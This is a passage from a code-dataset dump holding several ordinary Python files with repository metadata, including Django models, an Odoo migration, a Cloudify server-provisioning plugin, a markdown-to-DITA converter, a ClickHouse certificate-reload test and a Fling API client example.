hexsha (stringlengths 40..40) | size (int64 5..2.06M) | ext (stringclasses 10 values) | lang (stringclasses 1 value) | max_stars_repo_path (stringlengths 3..248) | max_stars_repo_name (stringlengths 5..125) | max_stars_repo_head_hexsha (stringlengths 40..78) | max_stars_repo_licenses (listlengths 1..10) | max_stars_count (int64 1..191k ⌀) | max_stars_repo_stars_event_min_datetime (stringlengths 24..24 ⌀) | max_stars_repo_stars_event_max_datetime (stringlengths 24..24 ⌀) | max_issues_repo_path (stringlengths 3..248) | max_issues_repo_name (stringlengths 5..125) | max_issues_repo_head_hexsha (stringlengths 40..78) | max_issues_repo_licenses (listlengths 1..10) | max_issues_count (int64 1..67k ⌀) | max_issues_repo_issues_event_min_datetime (stringlengths 24..24 ⌀) | max_issues_repo_issues_event_max_datetime (stringlengths 24..24 ⌀) | max_forks_repo_path (stringlengths 3..248) | max_forks_repo_name (stringlengths 5..125) | max_forks_repo_head_hexsha (stringlengths 40..78) | max_forks_repo_licenses (listlengths 1..10) | max_forks_count (int64 1..105k ⌀) | max_forks_repo_forks_event_min_datetime (stringlengths 24..24 ⌀) | max_forks_repo_forks_event_max_datetime (stringlengths 24..24 ⌀) | content (stringlengths 5..2.06M) | avg_line_length (float64 1..1.02M) | max_line_length (int64 3..1.03M) | alphanum_fraction (float64 0..1) | count_classes (int64 0..1.6M) | score_classes (float64 0..1) | count_generators (int64 0..651k) | score_generators (float64 0..1) | count_decorators (int64 0..990k) | score_decorators (float64 0..1) | count_async_functions (int64 0..235k) | score_async_functions (float64 0..1) | count_documentation (int64 0..1.04M) | score_documentation (float64 0..1)
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
dc077fe63cc4f8d54762c53d45a473600de38902 | 3,843 | py | Python | instagram/models.py | kilonzijnr/instagram-clone | 1fa662248d70a64356ef3d48d52c7e38dea95aff | [
"MIT"
]
| null | null | null | instagram/models.py | kilonzijnr/instagram-clone | 1fa662248d70a64356ef3d48d52c7e38dea95aff | [
"MIT"
]
| null | null | null | instagram/models.py | kilonzijnr/instagram-clone | 1fa662248d70a64356ef3d48d52c7e38dea95aff | [
"MIT"
]
| null | null | null | from django.db import models
from django.db.models.deletion import CASCADE
from django.contrib.auth.models import User
from cloudinary.models import CloudinaryField
# Create your models here.
class Profile(models.Model):
"""Model for handling User Profile"""
user = models.OneToOneField(User, on_delete= models.CASCADE)
username = models.CharField(max_length = 25)
signup_date = models.DateTimeField(auto_now_add= True)
profile_photo = CloudinaryField('images')
followers = models.ManyToManyField(User, related_name='followers', blank= True)
bio = models.CharField(max_length= 70)
def __str__(self):
return self.username
def total_followers(self):
"""Method to return total numberof followers"""
return self.followers.count()
def save_profile(self):
"""Method to save profile to the database"""
self.save()
def delete_profile(self):
"""Method to delete profile from the database"""
self.delete()
def update_profile(self,new):
"""Method to update user profile
Args:
new (Profile): profile instance carrying the updated field values
"""
self.username = new.username
self.bio = new.bio
self.profile_photo = new.profile_photo
self.save()
@classmethod
def get_following(cls,user):
"""Method to return all users a specific user is following """
following = user.followers.all()
users = []
for profile in following:
user = User.objects.get(profile = profile)
users.append(user)
return users
@classmethod
def search_profile(cls,search_term):
"""Method to return profiles with a provided search term"""
profiles = cls.objects.filter(username__icontains = search_term)
return profiles
class Likes(models.Model):
"""Model for handling Image likes"""
likes = models.IntegerField(default=0)
class Image(models.Model):
"""Model for handling Image posts by users"""
user = models.ForeignKey(User,on_delete= models.CASCADE)
image = CloudinaryField('images')
image_name = models.CharField(max_length= 25)
caption = models.CharField(max_length= 100)
profile = models.ForeignKey(Profile, on_delete=models.CASCADE, default= None)
likes = models.ForeignKey(Likes, on_delete=CASCADE, default=None)
comment = models.CharField(max_length= 120)
time_posted = models.DateTimeField(auto_now_add= True)
def __str__(self):
return self.image_name
def save_image(self):
"""Method to save Image to Database"""
self.save()
def delete_image(self):
"""Method to delete Image """
self.delete()
def like_image(self,user):
"""Method to register a like on the Image (the related Likes row keeps the counter)"""
# user is accepted for API compatibility; likes are tracked as a counter on Likes
self.likes.likes += 1
self.likes.save()
def get_total_likes(self):
"""Method to get the total number of likes on an Image"""
return self.likes.likes
def update_caption(self,caption):
"""Method to updat eimage captions in database"""
self.caption = caption
self.save()
@classmethod
def get_images(cls,users):
"""Method to get a specific image"""
posts = []
for user in users:
images = Image.objects.filter(user = user)
for image in images:
posts.append(image)
return posts
def get_comments(self):
"""Method to get all comments related to a post"""
comments = Comments.objects.filter(image = self)
return comments
class Comments(models.Model):
"""Method to define attributes of a comment"""
user = models.ForeignKey(User, on_delete=models.CASCADE)
image = models.ForeignKey(Image,on_delete=models.CASCADE)
comment = models.TextField()
def __str__(self):
return self.comment
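# Usage sketch (illustrative only, e.g. from `python manage.py shell`); the
# account details below are made up and assume migrations have been applied.
#
#     from django.contrib.auth.models import User
#     from instagram.models import Profile, Image
#
#     user = User.objects.create_user(username='demo', password='demo-pass')
#     profile = Profile(user=user, username='demo', bio='hello', profile_photo='demo.jpg')
#     profile.save_profile()
#     Profile.search_profile('dem')                  # profiles whose username contains 'dem'
#     Image.get_images(Profile.get_following(user))  # posts from users this user follows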
| 30.991935 | 83 | 0.650273 | 3,643 | 0.947957 | 0 | 0 | 817 | 0.212594 | 0 | 0 | 886 | 0.230549 |
dc0981553f7be2b377b0b4a03e7bcb8ef94d1db4 | 846 | py | Python | addons/purchase_request/migrations/13.0.4.0.0/post-migration.py | jerryxu4j/odoo-docker-build | 339a3229192582c289c19e276347af1326ce683f | [
"CC-BY-3.0"
]
| null | null | null | addons/purchase_request/migrations/13.0.4.0.0/post-migration.py | jerryxu4j/odoo-docker-build | 339a3229192582c289c19e276347af1326ce683f | [
"CC-BY-3.0"
]
| null | null | null | addons/purchase_request/migrations/13.0.4.0.0/post-migration.py | jerryxu4j/odoo-docker-build | 339a3229192582c289c19e276347af1326ce683f | [
"CC-BY-3.0"
]
| null | null | null | from odoo import SUPERUSER_ID, api
from odoo.tools.sql import column_exists
def migrate(cr, version=None):
env = api.Environment(cr, SUPERUSER_ID, {})
if column_exists(cr, "product_template", "purchase_request"):
_migrate_purchase_request_to_property(env)
def _migrate_purchase_request_to_property(env):
"""Create properties for all products with the flag set on all companies"""
env.cr.execute("select id, coalesce(purchase_request, False) from product_template")
values = dict(env.cr.fetchall())
for company in env["res.company"].with_context(active_test=False).search([]):
env["ir.property"].with_context(force_company=company.id).set_multi(
"purchase_request", "product.template", values, False,
)
env.cr.execute("alter table product_template drop column purchase_request")
| 42.3 | 88 | 0.734043 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 300 | 0.35461 |
dc0a134e4c11e64835152cefa26ff2db3778cd60 | 13,678 | py | Python | cfy/server.py | buhanec/cloudify-flexiant-plugin | da0c42a4330c9e5ffd55d9f5024a9a36f052af16 | [
"Apache-2.0"
]
| null | null | null | cfy/server.py | buhanec/cloudify-flexiant-plugin | da0c42a4330c9e5ffd55d9f5024a9a36f052af16 | [
"Apache-2.0"
]
| null | null | null | cfy/server.py | buhanec/cloudify-flexiant-plugin | da0c42a4330c9e5ffd55d9f5024a9a36f052af16 | [
"Apache-2.0"
]
| null | null | null | # coding=UTF-8
"""Server stuff."""
from __future__ import print_function
from cfy import (create_server,
create_ssh_key,
attach_ssh_key,
wait_for_state,
wait_for_cond,
create_nic,
attach_nic,
get_resource,
get_server_status,
start_server,
stop_server,
delete_resource)
import socket
import errno
from cloudify import ctx
from cloudify.decorators import operation
from cloudify.exceptions import NonRecoverableError
from cfy.helpers import (with_fco_api, with_exceptions_handled)
from resttypes import enums, cobjects
from paramiko import SSHClient, AutoAddPolicy
import spur
import spur.ssh
from time import sleep
from subprocess import call
from fabric.api import settings, run
import os
RT = enums.ResourceType
PROP_RESOURCE_ID = 'resource_id'
PROP_USE_EXISTING = 'use_existing'
PROP_IMAGE = 'image'
PROP_VDC = 'vdc'
PROP_NET = 'network'
PROP_SERVER_PO = 'server_type'
PROP_CPU_COUNT = 'cpu_count'
PROP_RAM_AMOUNT = 'ram_amount'
PROP_MANAGER_KEY = 'manager_key'
PROP_PRIVATE_KEYS = 'private_keys'
PROP_PUBLIC_KEYS = 'public_keys'
RPROP_UUID = 'uuid'
RPROP_DISKS = 'disks'
RPROP_NIC = 'nic'
RPROP_NICS = 'nics'
RPROP_IP = 'ip'
RPROP_USER = 'username'
RPROP_PASS = 'password'
@operation
@with_fco_api
@with_exceptions_handled
def create(fco_api, *args, **kwargs):
ctx.logger.info('starting server creation')
# Ease of access
_rp = ctx.instance.runtime_properties
_np = ctx.node.properties
# Check if existing server is to be used
if _np[PROP_USE_EXISTING]:
server = get_resource(fco_api, _np[PROP_RESOURCE_ID], RT.SERVER)
if not server.nics:
raise Exception('No NICs attached to server')
_rp[RPROP_UUID] = server.resourceUUID
_rp[RPROP_DISKS] = [d.resourceUUID for d in server.disks]
_rp[RPROP_NIC] = server.nics[0].resourceUUID
_rp[RPROP_NICS] = [n.resourceUUID for n in server.nics]
_rp[RPROP_IP] = server.nics[0].ipAddresses[0].ipAddress
_rp[RPROP_USER] = server.initialUser
_rp[RPROP_PASS] = server.initialPassword
return (_rp[RPROP_UUID], _rp[RPROP_IP], _rp[RPROP_USER],
_rp[RPROP_PASS])
# Get configuration
image = get_resource(fco_api, _np[PROP_IMAGE], RT.IMAGE)
if _np[PROP_VDC]:
vdc = get_resource(fco_api, _np[PROP_VDC], RT.VDC)
else:
vdc = None
network = get_resource(fco_api, _np[PROP_NET], RT.NETWORK)
server_po = get_resource(fco_api, _np[PROP_SERVER_PO], RT.PRODUCTOFFER)
manager_key = get_resource(fco_api, _np[PROP_MANAGER_KEY], RT.SSHKEY)
cpu_count = _np[PROP_CPU_COUNT]
ram_amount = _np[PROP_RAM_AMOUNT]
public_keys = _np[PROP_PUBLIC_KEYS] or []
private_keys = _np[PROP_PRIVATE_KEYS] or []
# Verify existence of private keys
missing_keys = set()
bad_permission_keys = set()
key_contents = {}
for key in private_keys:
try:
key_contents[key] = ctx.get_resource(os.path.expanduser(key))
except NonRecoverableError as e:
if 'HttpException: 404' in str(e):
missing_keys.add(key)
elif 'HttpException: 403' in str(e):
bad_permission_keys.add(key)
else:
raise
if missing_keys or bad_permission_keys:
raise Exception('Missing private keys: {}\nBad permission keys: {}'
.format(missing_keys, bad_permission_keys))
# Generate missing configuration
image_uuid = image.resourceUUID
if vdc is not None:
cluster_uuid = vdc.clusterUUID
vdc_uuid = vdc.resourceUUID
else:
cluster_uuid = image.clusterUUID
vdc_uuid = image.vdcUUID
network_uuid = network.resourceUUID
network_type = network.networkType
server_po_uuid = server_po.resourceUUID
manager_key_uuid = manager_key.resourceUUID
# TODO: better way of determining suitable disk
boot_disk_po_uuid = get_resource(fco_api,
'{} GB Storage Disk'.format(image.size),
RT.PRODUCTOFFER).resourceUUID
ctx.logger.info('Configuration: \n'
'image_uuid: %s\n'
'cluster_uuid: %s\n'
'vdc_uuid: %s\n'
'network_uuid: %s\n'
'server_po_uuid: %s\n'
'manager_key_uuid: %s\n'
'boot_disk_po_uuid: %s',
image_uuid, cluster_uuid, vdc_uuid, network_uuid,
server_po_uuid, manager_key_uuid, boot_disk_po_uuid)
# Create server
server_name = '{}{}_{}'.format(ctx.bootstrap_context.resources_prefix,
ctx.deployment.id, ctx.instance.id)
try:
server_uuid = _rp[RPROP_UUID]
except KeyError:
# key_obj = get_resource(fco_api, key_uuid, RT.SSHKEY)
# keys = SSHKey.REQUIRED_ATTRIBS.copy()
# keys.add('resourceUUID')
# submit_key = {}
# for k in keys:
# try:
# submit_key[k] = getattr(manager_key, k)
# except AttributeError:
# submit_key[k] = None
server_uuid = create_server(fco_api, server_po_uuid, image_uuid,
cluster_uuid, vdc_uuid, cpu_count,
ram_amount, boot_disk_po_uuid,
[manager_key], server_name)
_rp[RPROP_UUID] = server_uuid
ctx.logger.info('server_uuid: %s', server_uuid)
server = get_resource(fco_api, server_uuid, RT.SERVER)
server_nics = [nic.resourceUUID for nic in server.nics]
server_keys = [key.resourceUUID for key in server.sshkeys]
# Wait for server to be active
if not wait_for_state(fco_api, server_uuid, enums.ResourceState.ACTIVE,
RT.SERVER):
raise Exception('Server failed to prepare in time!')
ctx.logger.info('Server ACTIVE')
# Add keys
new_keys = set()
for key in public_keys:
if key not in server_keys:
key_uuid = create_ssh_key(fco_api, key, server_name + ' Key')
attach_ssh_key(fco_api, server_uuid, key_uuid)
new_keys.add(key_uuid)
ctx.logger.info('Keys attached: %s', new_keys)
# Create NIC
try:
nic_uuid = _rp[RPROP_NIC]
except KeyError:
nic_uuid = create_nic(fco_api, cluster_uuid, network_type,
network_uuid, vdc_uuid, server_name + ' NIC')
if not wait_for_state(fco_api, nic_uuid, enums.ResourceState.ACTIVE,
RT.NIC):
raise Exception('NIC failed to create in time!')
_rp[RPROP_NIC] = nic_uuid
ctx.logger.info('nic_uuid: %s', nic_uuid)
# Stop server if started
if get_server_status(fco_api, server_uuid) != enums.ServerStatus.STOPPED:
if not stop_server(fco_api, server_uuid):
raise Exception('Stopping server failed to complete in time!')
ctx.logger.info('Server STOPPED')
# Attach NIC
if nic_uuid not in server_nics:
job_uuid = attach_nic(fco_api, server_uuid, nic_uuid, 1).resourceUUID
cond = cobjects.Job.status == enums.JobStatus.SUCCESSFUL
if not wait_for_cond(fco_api, job_uuid, cond, RT.JOB):
raise Exception('Attaching NIC failed to complete in time!')
ctx.logger.info('NICs attached')
else:
ctx.logger.info('NICs already attached')
# Start server if not started
if get_server_status(fco_api, server_uuid) == enums.ServerStatus.STOPPED:
if not start_server(fco_api, server_uuid):
raise Exception('Running server failed to complete in time!')
ctx.logger.info('Server RUNNING')
nic = get_resource(fco_api, nic_uuid, RT.NIC)
server_ip = nic.ipAddresses[0].ipAddress
server_port = 22
ctx.logger.info('Server READY')
username = server.initialUser
password = server.initialPassword
ssh_attempts = -1
ssh_delay = 3
# Fabric test
while ssh_attempts:
ctx.logger.info('Attempting to SSH ({})'.format(ssh_attempts))
try:
with settings(host_string=server_ip, user=username,
password=password, disable_known_hosts=True,
abort_exception=Exception):
run('mkdir ~/.ssh')
run('chmod 0700 ~/.ssh')
for key, key_content in key_contents.items():
remote = os.path.join('~', '.ssh', os.path.basename(key))
run('echo \'{}\' > {}'.format(key_content, remote))
run('chmod 0600 ' + remote)
ctx.logger.info('Done')
break
except Exception as e:
ctx.logger.info(e)
ssh_attempts -= 1
else:
raise Exception('Failed to provision keys in time')
# # Spur test
# while ssh_attempts:
# ctx.logger.info('Attempting to SSH ({})'.format(ssh_attempts))
# shell = spur.SshShell(
# hostname=server_ip,
# port=server_port,
# username=username,
# password=password,
# shell_type=spur.ssh.ShellTypes.minimal,
# missing_host_key=spur.ssh.MissingHostKey.accept
# )
# with shell:
# try:
# ctx.logger.info('Creating & chmoding .ssh')
# shell.run(['mkdir', '~/.ssh'])
# shell.run(['chmod', '0700', '~/.ssh'])
# for key, key_content in key_contents.items():
# ctx.logger.info('Adding private key: ' + remote)
# remote = os.path.join('~', '.ssh', os.path.basename(key))
# shell.run(['echo', "'{}'".format(key_content), '>',
# remote])
# shell.run(['chmod', '0600', remote])
# except spur.ssh.ConnectionError as e:
# if e.original_error[0] not in {errno.ECONNREFUSED,
# errno.EHOSTUNREACH}:
# raise
# sleep(ssh_delay)
# ssh_attempts -= 1
# else:
# raise Exception('Failed to provision keys in time')
# # Provision private keys
# ssh = SSHClient()
# call(['ssh-keygen', '-R', server_ip])
# ssh.set_missing_host_key_policy(AutoAddPolicy())
#
# while ssh_attempts:
# try:
# ctx.logger.info('Attempting to SSH ({})'.format(ssh_attempts))
# ctx.logger.info('SSH Connection details: {}'.format(
# ((server_ip, server_port, username, password, ssh_delay))))
# ssh.connect(server_ip, server_port, username, password,
# timeout=ssh_delay, look_for_keys=False)
# ctx.logger.info('SSH connection established')
# break
# except socket.timeout:
# ssh_attempts -= 1
# except socket.error as e:
# if e[0] not in {errno.ECONNREFUSED, errno.EHOSTUNREACH}:
# ctx.logger.info('SSH connection failed: %s', e[0])
# raise
# sleep(ssh_delay)
# ssh_attempts -= 1
# else:
# raise Exception('Failed to provision keys in time')
# ssh.exec_command('mkdir ~/.ssh')
# ssh.exec_command('chmod 0700 ~/.ssh')
# for key, key_content in key_contents.items():
# remote = os.path.join('~', '.ssh', os.path.basename(key))
# ssh.exec_command('echo \'{}\' > {}'.format(key_content, remote))
# ssh.exec_command('chmod 0600 ' + remote)
_rp[RPROP_UUID] = server_uuid
_rp[RPROP_IP] = server_ip
_rp[RPROP_USER] = username
_rp[RPROP_PASS] = password
server = get_resource(fco_api, server_uuid, RT.SERVER)
_rp[RPROP_DISKS] = [d.resourceUUID for d in server.disks]
_rp[RPROP_NICS] = [n.resourceUUID for n in server.nics]
ctx.logger.info('Server IP: ' + server_ip)
ctx.logger.info('Server User: ' + username)
ctx.logger.info('Server Password: ' + password)
return server_uuid, server_ip, username, password
@operation
@with_fco_api
@with_exceptions_handled
def delete(fco_api, *args, **kwargs):
server_uuid = ctx.instance.runtime_properties.get(RPROP_UUID)
job_uuid = delete_resource(fco_api, server_uuid, RT.SERVER, True) \
.resourceUUID
cond = cobjects.Job.status == enums.JobStatus.SUCCESSFUL
if not wait_for_cond(fco_api, job_uuid, cond, RT.JOB):
raise Exception('Failed to delete server')
@operation
@with_fco_api
@with_exceptions_handled
def start(fco_api, *args, **kwargs):
server_uuid = ctx.instance.runtime_properties.get(RPROP_UUID)
if get_server_status(fco_api, server_uuid) != enums.ServerStatus.RUNNING:
if not start_server(fco_api, server_uuid):
raise Exception('Could not start server!')
@operation
@with_fco_api
@with_exceptions_handled
def stop(fco_api, *args, **kwargs):
server_uuid = ctx.instance.runtime_properties.get(RPROP_UUID)
if get_server_status(fco_api, server_uuid) != enums.ServerStatus.STOPPED:
if not stop_server(fco_api, server_uuid):
raise Exception('Could not stop server!')
@operation
@with_fco_api
@with_exceptions_handled
def creation_validation(fco_api, *args, **kwargs):
server_uuid = ctx.instance.runtime_properties.get(RPROP_UUID)
try:
get_resource(fco_api, server_uuid, RT.SERVER)
except Exception:
return False
return True
| 36.281167 | 79 | 0.615222 | 0 | 0 | 0 | 0 | 12,294 | 0.898816 | 0 | 0 | 4,192 | 0.306478 |
dc0ae53c3bb6f54a76cfb756f32ba1e86d22317c | 7,317 | py | Python | markdown2dita.py | mattcarabine/markdown2dita | f4a02c3e9514d33eb3cea9c9b5d3c44817afad97 | [
"BSD-3-Clause"
]
| 6 | 2019-06-28T12:47:01.000Z | 2022-02-14T18:18:53.000Z | markdown2dita.py | mattcarabine/markdown2dita | f4a02c3e9514d33eb3cea9c9b5d3c44817afad97 | [
"BSD-3-Clause"
]
| null | null | null | markdown2dita.py | mattcarabine/markdown2dita | f4a02c3e9514d33eb3cea9c9b5d3c44817afad97 | [
"BSD-3-Clause"
]
| 2 | 2018-02-09T22:17:48.000Z | 2020-02-20T13:59:30.000Z | # coding: utf-8
"""
markdown2dita
~~~~~~~~~~~~~
A markdown to dita-ot conversion tool written in pure python.
Uses mistune to parse the markdown.
"""
from __future__ import print_function
import argparse
import sys
import mistune
__version__ = '0.3'
__author__ = 'Matt Carabine <[email protected]>'
__all__ = ['Renderer', 'Markdown', 'markdown', 'escape']
class Renderer(mistune.Renderer):
def codespan(self, text):
return '<codeph>{0}</codeph>'.format(escape(text.rstrip()))
def link(self, link, title, content):
return '<xref href="{0}">{1}</xref>'.format(link, escape(content or title))
def block_code(self, code, language=None):
code = escape(code.rstrip('\n'))
if language:
return ('<codeblock outputclass="language-{0}">{1}</codeblock>'
.format(language, code))
else:
return '<codeblock>{0}</codeblock>'.format(code)
def block_quote(self, text):
return '<codeblock>{0}</codeblock>'.format(text)
def header(self, text, level, raw=None):
# Dita only supports one title per section
title_level = self.options.get('title_level', 2)
if level <= title_level:
return '</section><section><title>{0}</title>'.format(text)
else:
return '<p><b>{0}</b></p>'.format(text)
def double_emphasis(self, text):
return '<b>{0}</b>'.format(text)
def emphasis(self, text):
return '<i>{0}</i>'.format(text)
def hrule(self):
# Dita has no horizontal rule, ignore it
# could maybe divide sections?
return ''
def inline_html(self, text):
# Dita does not support inline html, just pass it through
return text
def list_item(self, text):
return '<li>{0}</li>'.format(text)
def list(self, body, ordered=True):
if ordered:
return '<ol>{0}</ol>'.format(body)
else:
return '<ul>{0}</ul>'.format(body)
def image(self, src, title, text):
# Derived from the mistune library source code
src = mistune.escape_link(src)
text = escape(text, quote=True)
if title:
title = escape(title, quote=True)
output = ('<fig><title>{0}</title>\n'
'<image href="{1}" alt="{2}"/></fig>'
.format(title, src, text))
else:
output = '<image href="{0}" alt="{1}"/>'.format(src, text)
return output
def table(self, header, body, cols):
col_string = ['<colspec colname="col{0}"/>'.format(x+1)
for x in range(cols)]
output_str = ('<table>\n<tgroup cols="{0}">\n{1}\n'
.format(cols, '\n'.join(col_string)))
return (output_str + '<thead>\n' + header + '</thead>\n<tbody>\n' +
body + '</tbody>\n</tgroup>\n</table>')
def table_row(self, content):
return '<row>\n{0}</row>\n'.format(content)
def table_cell(self, content, **flags):
align = flags['align']
if align:
return '<entry align="{0}">{1}</entry>\n'.format(align, content)
else:
return '<entry>{0}</entry>\n'.format(content)
def autolink(self, link, is_email=False):
text = link = escape(link)
if is_email:
link = 'mailto:{0}'.format(link)
return '<xref href="{0}">{1}</xref>'.format(link, text)
def footnote_ref(self, key, index):
return ''
def footnote_item(self, key, text):
return ''
def footnotes(self, text):
return ''
def strikethrough(self, text):
return text
class Markdown(mistune.Markdown):
def __init__(self, renderer=None, inline=None, block=None, **kwargs):
if not renderer:
renderer = Renderer(**kwargs)
else:
kwargs.update(renderer.options)
super(Markdown, self).__init__(
renderer=renderer, inline=inline, block=block)
def parse(self, text, page_id='enter-id-here',
title='Enter the page title here'):
output = super(Markdown, self).parse(text)
if output.startswith('</section>'):
output = output[len('</section>'):]
else:
output = '<section>\n' + output
output = """<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE concept PUBLIC "-//OASIS//DTD DITA Concept//EN" "concept.dtd">
<concept xml:lang="en-us" id="{0}">
<title>{1}</title>
<shortdesc>Enter the short description for this page here</shortdesc>
<conbody>
{2}</section>
</conbody>
</concept>""".format(page_id, title, output)
return output
def output_table(self):
# Derived from the mistune library source code
aligns = self.token['align']
aligns_length = len(aligns)
cell = self.renderer.placeholder()
# header part
header = self.renderer.placeholder()
cols = len(self.token['header'])
for i, value in enumerate(self.token['header']):
align = aligns[i] if i < aligns_length else None
flags = {'header': True, 'align': align}
cell += self.renderer.table_cell(self.inline(value), **flags)
header += self.renderer.table_row(cell)
# body part
body = self.renderer.placeholder()
for i, row in enumerate(self.token['cells']):
cell = self.renderer.placeholder()
for j, value in enumerate(row):
align = aligns[j] if j < aligns_length else None
flags = {'header': False, 'align': align}
cell += self.renderer.table_cell(self.inline(value), **flags)
body += self.renderer.table_row(cell)
return self.renderer.table(header, body, cols)
def escape(text, quote=False, smart_amp=True):
return mistune.escape(text, quote=quote, smart_amp=smart_amp)
def _parse_args(args):
parser = argparse.ArgumentParser(description='markdown2dita - a markdown '
'to dita-ot CLI conversion tool.')
parser.add_argument('-i', '--input-file',
help='input markdown file to be converted.'
'If omitted, input is taken from stdin.')
parser.add_argument('-o', '--output-file',
help='output file for the converted dita content.'
'If omitted, output is sent to stdout.')
return parser.parse_args(args)
def markdown(text, escape=True, **kwargs):
return Markdown(escape=escape, **kwargs)(text)
def main():
parsed_args = _parse_args(sys.argv[1:])
if parsed_args.input_file:
input_str = open(parsed_args.input_file, 'r').read()
elif not sys.stdin.isatty():
input_str = ''.join(line for line in sys.stdin)
else:
print('No input file specified and unable to read input on stdin.\n'
"Use the '-h' or '--help' flag to see usage information",
file=sys.stderr)
exit(1)
markdown = Markdown()
dita_output = markdown(input_str)
if parsed_args.output_file:
with open(parsed_args.output_file, 'w') as output_file:
output_file.write(dita_output)
else:
print(dita_output)
if __name__ == '__main__':
main()
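# In-process usage sketch (separate from the CLI entry point above); the
# markdown snippet is illustrative only.
#
#     import markdown2dita
#     dita = markdown2dita.markdown('# Heading\n\nSome *emphasis*, a [link](http://example.com) and `code`.')
#     print(dita)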
| 31.403433 | 83 | 0.577012 | 5,403 | 0.738417 | 0 | 0 | 0 | 0 | 0 | 0 | 2,009 | 0.274566 |
dc0c391d6f0cc20589629aa4ecb77f77c49b34a1 | 2,957 | py | Python | tests/integration/test_reload_certificate/test.py | roanhe-ts/ClickHouse | 22de534fdcd3f05e27423d13f5875f97c3ba5f10 | [
"Apache-2.0"
]
| 1 | 2022-02-08T03:09:51.000Z | 2022-02-08T03:09:51.000Z | tests/integration/test_reload_certificate/test.py | roanhe-ts/ClickHouse | 22de534fdcd3f05e27423d13f5875f97c3ba5f10 | [
"Apache-2.0"
]
| 1 | 2022-03-21T07:27:34.000Z | 2022-03-21T07:27:34.000Z | tests/integration/test_reload_certificate/test.py | roanhe-ts/ClickHouse | 22de534fdcd3f05e27423d13f5875f97c3ba5f10 | [
"Apache-2.0"
]
| null | null | null | import pytest
import os
from helpers.cluster import ClickHouseCluster
SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))
cluster = ClickHouseCluster(__file__)
node = cluster.add_instance('node', main_configs=["configs/first.crt", "configs/first.key",
"configs/second.crt", "configs/second.key",
"configs/cert.xml"])
@pytest.fixture(scope="module", autouse=True)
def started_cluster():
try:
cluster.start()
yield cluster
finally:
cluster.shutdown()
def change_config_to_key(name):
'''
* Generate config with certificate/key name from args.
* Reload config.
'''
node.exec_in_container(["bash", "-c" , """cat > /etc/clickhouse-server/config.d/cert.xml << EOF
<?xml version="1.0"?>
<clickhouse>
<https_port>8443</https_port>
<openSSL>
<server>
<certificateFile>/etc/clickhouse-server/config.d/{cur_name}.crt</certificateFile>
<privateKeyFile>/etc/clickhouse-server/config.d/{cur_name}.key</privateKeyFile>
<loadDefaultCAFile>true</loadDefaultCAFile>
<cacheSessions>true</cacheSessions>
<disableProtocols>sslv2,sslv3</disableProtocols>
<preferServerCiphers>true</preferServerCiphers>
</server>
</openSSL>
</clickhouse>
EOF""".format(cur_name=name)])
node.query("SYSTEM RELOAD CONFIG")
def test_first_than_second_cert():
''' Consistently set first key and check that only it will be accepted, then repeat same for second key. '''
# Set first key
change_config_to_key('first')
# Command with correct certificate
assert node.exec_in_container(['curl', '--silent', '--cacert', '/etc/clickhouse-server/config.d/{cur_name}.crt'.format(cur_name='first'),
'https://localhost:8443/']) == 'Ok.\n'
# Command with wrong certificate
# This command don't use option '-k', so it will lead to error while execution.
# That's why except will always work
try:
node.exec_in_container(['curl', '--silent', '--cacert', '/etc/clickhouse-server/config.d/{cur_name}.crt'.format(cur_name='second'),
'https://localhost:8443/'])
assert False
except:
assert True
# Change to other key
change_config_to_key('second')
# Command with correct certificate
assert node.exec_in_container(['curl', '--silent', '--cacert', '/etc/clickhouse-server/config.d/{cur_name}.crt'.format(cur_name='second'),
'https://localhost:8443/']) == 'Ok.\n'
# Command with wrong certificate
# Same as previous
try:
node.exec_in_container(['curl', '--silent', '--cacert', '/etc/clickhouse-server/config.d/{cur_name}.crt'.format(cur_name='first'),
'https://localhost:8443/'])
assert False
except:
assert True
| 38.907895 | 142 | 0.622929 | 0 | 0 | 117 | 0.039567 | 163 | 0.055123 | 0 | 0 | 1,723 | 0.582685 |
dc0d2dd1628c5437389a9030a61c8c8847b09265 | 1,331 | py | Python | examples/python/fling.py | arminfriedl/fling | 909606a9960fede8951436748c20a9600819b93a | [
"MIT"
]
| null | null | null | examples/python/fling.py | arminfriedl/fling | 909606a9960fede8951436748c20a9600819b93a | [
"MIT"
]
| null | null | null | examples/python/fling.py | arminfriedl/fling | 909606a9960fede8951436748c20a9600819b93a | [
"MIT"
]
| null | null | null | import flingclient as fc
from flingclient.rest import ApiException
from datetime import datetime
# Per default the dockerized fling service runs on localhost:3000 In case you
# run your own instance, change the base url
configuration = fc.Configuration(host="http://localhost:3000")
# Every call, with the exception of `/api/auth`, is has to be authorized by a
# bearer token. Get a token by authenticating as admin and set it into the
# configuration. All subsequent calls will send this token in the header as
# `Authorization: Bearer <token> header`
def authenticate(admin_user, admin_password):
with fc.ApiClient(configuration) as api_client:
auth_client = fc.AuthApi(api_client)
admin_auth = fc.AdminAuth(admin_user, admin_password)
configuration.access_token = auth_client.authenticate_owner(admin_auth=admin_auth)
admin_user = input("Username: ")
admin_password = input("Password: ")
authenticate(admin_user, admin_password)
with fc.ApiClient(configuration) as api_client:
# Create a new fling
fling_client = fc.FlingApi(api_client)
fling = fc.Fling(name="A Fling from Python", auth_code="secret",
direct_download=False, allow_upload=True,
expiration_time=datetime(2099, 12, 12))
fling = fling_client.post_fling()
print(f"Created a new fling: {fling}")
#
| 40.333333 | 86 | 0.75432 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 515 | 0.386927 |
dc0d3f00ae59f64419ff5f7a5aba262466241f01 | 1,811 | py | Python | pretraining/python/download_tensorboard_logs.py | dl4nlp-rg/PTT5 | cee2d996ba7eac80d7764072eef01a7f9c38836c | [
"MIT"
]
| 51 | 2020-08-11T13:34:07.000Z | 2022-01-20T23:09:32.000Z | pretraining/python/download_tensorboard_logs.py | dl4nlp-rg/PTT5 | cee2d996ba7eac80d7764072eef01a7f9c38836c | [
"MIT"
]
| 4 | 2020-09-28T20:33:31.000Z | 2022-03-12T00:46:13.000Z | pretraining/python/download_tensorboard_logs.py | unicamp-dl/PTT5 | aee3e0d0b6ad1bb6f8c2d9afd1d2e89679301f6f | [
"MIT"
]
| 6 | 2021-01-25T07:47:40.000Z | 2022-02-23T20:06:03.000Z | import tensorflow.compat.v1 as tf
import os
import tqdm
GCS_BUCKET = 'gs://ptt5-1'
